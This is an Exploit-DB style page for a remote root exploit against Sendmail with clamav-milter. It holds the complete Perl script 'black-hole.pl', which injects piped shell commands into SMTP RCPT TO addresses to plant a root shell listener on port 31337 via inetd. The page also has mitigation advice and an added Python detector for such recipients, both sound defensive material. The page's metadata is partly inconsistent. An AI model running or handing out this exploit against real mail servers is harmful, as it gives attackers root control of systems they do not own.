vendor: Sendmail with clamav-milter
by: Eliteboy
CVSS: 9 (CRITICAL)
CWE: Remote Root Exploit
Product Name: Sendmail with clamav-milter
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

black-hole.pl

The Sendmail w/ clamav-milter Remote Root Exploit allows an attacker to gain remote root access to the target system. The exploit sends SMTP commands to the target's Sendmail service on TCP port 25 in which the RCPT TO recipient address carries a quoted pipe character followed by a shell command, and those commands are executed with root privileges.

Mitigation:

To mitigate this vulnerability, it is recommended to update Sendmail and clamav-milter to their latest versions. Additionally, network-level controls, such as firewalls, can be implemented to restrict access to the affected services.
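A detection check to go with the mitigation above, as an added example that is not part of the original page or the exploit author's code: it scans captured SMTP command lines for RCPT TO recipients whose local part contains shell metacharacters. The function names and the sample session are constructed for illustration.

```python
import re

# Captures everything between the angle brackets of an SMTP RCPT TO command.
# Greedy on purpose: a local part may itself contain '>' (a shell redirect).
RCPT_RE = re.compile(r'^\s*rcpt\s+to:\s*<(.*)>', re.IGNORECASE)

# '|' and '`' are legal in a local part but rare in real recipients,
# so a hit is a lead for review, not proof of compromise.
SHELL_META = set('|;`<>')

def split_local_part(path):
    """Return the local part of a forward-path, honouring quoted strings."""
    in_quotes = escaped = False
    for i, ch in enumerate(path):
        if escaped:
            escaped = False
        elif ch == '\\':
            escaped = True
        elif ch == '"':
            in_quotes = not in_quotes
        elif ch == '@' and not in_quotes:
            return path[:i]          # first '@' outside quotes ends the local part
    return path

def suspicious_rcpt(line):
    """None if line is not RCPT TO; otherwise the sorted metacharacters found."""
    m = RCPT_RE.match(line)
    if not m:
        return None
    return sorted(set(split_local_part(m.group(1))) & SHELL_META)

def scan(lines):
    """Return (line_number, metacharacters) for every suspicious RCPT TO line."""
    hits = []
    for n, line in enumerate(lines, 1):
        found = suspicious_rcpt(line)
        if found:
            hits.append((n, found))
    return hits

# Constructed sample session (client side only), not captured traffic.
SAMPLE = [
    'ehlo client.example',
    'mail from: <alice@example.org>',
    'rcpt to: <bob@example.org>',
    'RCPT TO:<nobody+"|/bin/true"@localhost>',
    'rcpt to: <"odd@name"@example.org>',
    'data',
]

if __name__ == '__main__':
    for lineno, chars in scan(SAMPLE):
        print(f'line {lineno}: shell metacharacters {chars} in recipient local part')
```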

Exploit-DB raw data:

### black-hole.pl
### Sendmail w/ clamav-milter Remote Root Exploit
### Copyright (c) 2007 Eliteboy
########################################################
use IO::Socket;

print "Sendmail w/ clamav-milter Remote Root Exploit\n";
print "Copyright (C) 2007 Eliteboy\n";

if ($#ARGV != 0) {print "Give me a host to connect.\n";exit;}

print "Attacking $ARGV[0]...\n";

$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '25',
                              Proto    => 'tcp');

print $sock "ehlo you\r\n";
print $sock "mail from: <>\r\n";
print $sock "rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n";
print $sock "rcpt to: <nobody+\"|/etc/init.d/inetd restart\"@localhost>\r\n";
print $sock "data\r\n.\r\nquit\r\n";

while (<$sock>) {
        print;
}

# milw0rm.com [2007-12-21]